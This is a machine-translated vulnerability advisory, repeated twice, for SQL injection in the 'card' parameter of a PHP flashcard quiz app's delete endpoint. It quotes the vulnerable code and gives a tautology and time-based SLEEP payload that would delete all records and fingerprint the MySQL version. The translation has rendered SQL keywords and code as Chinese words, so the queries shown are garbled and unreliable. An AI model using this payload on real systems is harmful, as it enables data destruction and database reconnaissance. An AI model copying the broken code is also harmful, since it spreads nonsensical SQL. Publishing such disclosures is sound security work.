#利用标题:抽筋测验应用程序V1.0-'卡'SQL注入
#Google Dork: N/A
#Application:抽水卡测验应用
#日期: 25.02.2024
#BUGS: SQL注入
#利用作者: Sospiro
#供应商homepage3360 https://www.sourcecodester.com/
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Windows 10 64位Wampserver
#CVE : N/A
##漏洞描述:
提供的PHP代码容易受到SQL注入的影响。当将用户输入直接连接到SQL查询中而无需适当的消毒时,就会发生SQL注入,从而使攻击者可以操纵SQL查询并可能在数据库上执行未经授权的操作。
##概念证明(POC):
此漏洞涉及将恶意SQL代码注入URL中的“卡”参数。
1。原始代码:
$ card=$ _get ['card'];
$ query='从tbl_card delete whend tbl_card_id='$ card'';
2。有效:
'或'1'='1';选择(版本()喜欢'8.0.31%',睡眠(5),0); - -
3。注射QUERY:
从tbl_card删除tbl_card_id=''或'1'='1';选择(版本()喜欢'8.0.31%',睡眠(5),0); - -
请求响应foto: ##弱势代码部分:
==========================================================================
端点/delete-flashcard.php
$ card=$ _get ['card'];
$ query='从tbl_card delete whend tbl_card_id='$ card'';
#Google Dork: N/A
#Application:抽水卡测验应用
#日期: 25.02.2024
#BUGS: SQL注入
#利用作者: Sospiro
#供应商homepage3360 https://www.sourcecodester.com/
#软件link: https://www.sourcecodester.com/php/...-using-php-and-php-and-mysql-source-code.html
#版本: 1.0
#测试在: Windows 10 64位Wampserver
#CVE : N/A
##漏洞描述:
提供的PHP代码容易受到SQL注入的影响。当将用户输入直接连接到SQL查询中而无需适当的消毒时,就会发生SQL注入,从而使攻击者可以操纵SQL查询并可能在数据库上执行未经授权的操作。
##概念证明(POC):
此漏洞涉及将恶意SQL代码注入URL中的“卡”参数。
1。原始代码:
$ card=$ _get ['card'];
$ query='从tbl_card delete whend tbl_card_id='$ card'';
2。有效:
'或'1'='1';选择(版本()喜欢'8.0.31%',睡眠(5),0); - -
3。注射QUERY:
从tbl_card删除tbl_card_id=''或'1'='1';选择(版本()喜欢'8.0.31%',睡眠(5),0); - -
请求响应foto: ##弱势代码部分:
==========================================================================
端点/delete-flashcard.php
$ card=$ _get ['card'];
$ query='从tbl_card delete whend tbl_card_id='$ card'';